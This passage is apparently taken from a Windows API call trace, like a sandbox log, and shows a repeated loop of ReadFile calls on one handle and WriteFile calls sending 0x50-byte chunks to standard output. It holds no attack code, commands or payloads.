(in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.362] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.362] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.362] GetFileType (hFile=0x50) returned 0x1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.363] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.363] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] GetFileType (hFile=0x50) returned 0x1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.363] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.364] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.364] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.364] GetFileType (hFile=0x50) returned 0x1 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] GetFileType (hFile=0x50) returned 0x1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.365] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.365] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.365] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.366] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] GetFileType (hFile=0x50) returned 0x1 [0214.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.366] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.367] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.367] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] GetFileType (hFile=0x50) returned 0x1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.367] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.368] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.368] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.368] GetFileType (hFile=0x50) returned 0x1 [0214.368] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.369] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.369] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.369] GetFileType (hFile=0x50) returned 0x1 [0214.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.370] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.370] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] GetFileType (hFile=0x50) returned 0x1 [0214.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.370] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: 